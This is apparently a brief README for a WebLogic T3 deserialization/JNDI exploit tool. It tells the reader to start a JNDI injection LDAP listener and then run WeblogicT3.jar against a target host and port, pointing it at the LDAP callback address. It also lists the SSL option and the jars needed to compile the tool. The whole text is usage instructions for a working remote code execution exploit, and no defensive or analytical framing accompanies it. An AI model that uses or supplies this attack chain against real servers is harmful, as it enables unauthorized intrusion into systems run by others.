
First, use NDI-Injection-Exploit to listen and generate an LDAP address.
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Target and -RMI are required. For HTTPS, use the --SSL parameter. -Port defaults to 7001.
If compiling from source, you need to add coherence.jar and wlfullclient.jar.